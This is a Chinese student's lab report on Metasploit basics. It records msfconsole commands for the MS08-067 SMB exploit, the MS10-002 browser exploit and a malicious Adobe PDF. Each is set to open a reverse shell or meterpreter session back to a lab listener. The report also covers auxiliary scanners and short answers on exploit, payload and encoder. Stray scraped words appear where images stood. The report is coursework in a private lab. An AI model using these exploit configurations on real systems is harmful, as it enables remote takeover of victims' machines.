2017-2018-2 20155203《網絡對抗技術》Exp5 MSF基礎應用

1.實踐過程記錄

1.1一個主動攻擊實踐,如ms08_067;

msf > search ms08_067_netapi //查看能夠用的工具
[!] Module database cache not built yet, using slow search

Matching Modules
================

   Name                                 Disclosure Date  Rank   Description
   ----                                 ---------------  ----   -----------
   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  MS08-067 Microsoft Server Service Relative Path Stack Corruption
msf exploit(windows/smb/ms08_067_netapi) > set payload generic/shell_reverse_tcp
msf exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.154.129
msf exploit(windows/smb/ms08_067_netapi) > set LPORT 5203
msf exploit(windows/smb/ms08_067_netapi) > set RHOST 192.168.154.144
msf exploit(windows/smb/ms08_067_netapi) > set RPORT 445 //該端口號只能使用445或139,是對應漏洞的固定端口
msf exploit(windows/smb/ms08_067_netapi) > set target 0
msf exploit(windows/smb/ms08_067_netapi) > exploit

一開始反覆出現這個錯誤web

Exploit failed: No encoders encoded the buffer successfully

重啓攻擊機,並新建一個xp靶機,回連成功。
shell

出現如下錯誤:
windows

能夠嘗試關閉防火牆解決。api

1.2 一個針對瀏覽器的攻擊,如MS10_002;

可使用show options查看設置參數的方法。瀏覽器

msf exploit(windows/browser/ms10_002_aurora) > show options

Module options (exploit/windows/browser/ms10_002_aurora):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Automatic

進行相應設置:session

在靶機鏈接到該網頁後,直接進入會話sessions -i 4dom

1.3 一個針對客戶端的攻擊,如Adobe;

生成pdf:tcp

msf exploit(windows/browser/ms10_002_aurora) > search adobe_cooltype_sing
msf exploit(windows/browser/ms10_002_aurora) > use exploit/windows/fileformat/adobe_cooltype_sing
msf exploit(windows/fileformat/adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp
msf exploit(windows/fileformat/adobe_cooltype_sing) > set LHOST 192.168.154.129
msf exploit(windows/fileformat/adobe_cooltype_sing) > set LPORT 5203
msf exploit(windows/fileformat/adobe_cooltype_sing) > set FILENAME 20155203dkx.pdf
msf exploit(windows/fileformat/adobe_cooltype_sing) > exploit

[*] Creating '20155203dkx.pdf' file...
[+] 20155203dkx.pdf stored at /root/.msf4/local/20155203dkx.pdf

生成的文件須要在這裏打開顯示隱藏文件夾:
工具

使用監聽模塊回連:
ui

1.4 成功應用任何一個輔助模塊。(0.5分)

  • 選用了scanner/http/webdav_scanner

不太明白這個是幹嗎的原本覺得是一個漏洞掃描,直接打開show options查看了參數,設置了RHOSTS,這裏靶機的地址能夠是多個,可是我設置的時候出錯了,實踐代表必須是多個同一網段的主機地址,以後顯示成功,這是表示webdav是開啓的。

  • 使用scanner/http/prev_dir_same_name_file模塊

這個模塊用來檢索匹配目標主機的指定路徑下的文件。

如下是有關它的功能的描述:

該模塊識別第一個父目錄中與給定目錄路徑具備相同名稱的文件。 示例:PATH爲Test / backup / files /將查找Test路徑下文件/backup/files.ext,.ext爲設定的文件類型。
如下結果說明掃描成功。

2.離實戰還缺些什麼技術或步驟?

實戰的話應該要從具體的靶機環境考慮,不能只依賴msf這個工具。

3.實踐總結與體會

msf是一個比較全面的工具,從此次實驗中能夠看出msf能作的滲透攻擊仍是很侷限的,必須使用英文版的很是「原始」的xp。可是能從各類角度攻擊成功,很是有成就感

4.基礎問題回答

(1)用本身的話解釋什麼是exploit,payload,encode.

exploit是用來發起攻擊的載體。 payload是執行攻擊的代碼。 encode是攻擊代碼的編碼方式。

相關文章
相關標籤/搜索